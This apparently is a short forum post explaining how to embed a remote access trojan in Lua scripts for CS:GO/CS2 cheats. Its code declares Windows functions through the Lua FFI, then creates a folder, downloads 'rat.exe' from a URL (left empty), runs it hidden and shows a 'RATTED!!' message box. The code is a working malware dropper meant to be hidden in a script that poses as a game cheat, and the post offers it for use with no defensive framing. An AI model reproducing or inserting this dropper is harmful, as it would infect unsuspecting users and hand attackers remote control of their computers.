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I think everyone knows about this but i will still share it here. this is how you Insert a RAT insto a lua script for any csgo/cs2 cheat.
You can create a Lua RAT for every cheat what has Lua API or the API allows shell ext.
You can create a Lua RAT for every cheat what has Lua API or the API allows shell ext.
typedef int(__thiscall* get_clipboard_text_count)(void*);
typedef void(__thiscall* set_clipboard_text)(void*, const char*, int);
typedef void(__thiscall* get_clipboard_text)(void*, int, const char*, int);
bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);
void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);
void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);
bool DeleteUrlCacheEntryA(const char* lpszUrlName);
typedef int(__fastcall* clantag_t)(const char*, const char*);
bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);
void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);
void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);
int MessageBoxA(void *w, const char *txt, const char *cap, int type);
int ShellExecuteA(void* hwnd, const char* lpOperation, const char* lpFile, const char* lpParameters, const char* lpDirectory, int nShowCmd);
local Shell32 = ffi.load 'Shell32.dll'
local urlmon = ffi.load 'UrlMon'
local wininet = ffi.load 'WinInet'
ffi.C.CreateDirectoryA("C:\\ratted", nil)
urlmon.URLDownloadToFileA(nil, "", "C:\\ratted\\rat.exe", 0,0)
Shell32.ShellExecuteA(nil, 'open', "C:\\ratted\\rat.exe", nil, nil, 0)
ffi.C.MessageBoxA(nil, "RATTED!!", "RATTED", 0x00004000)
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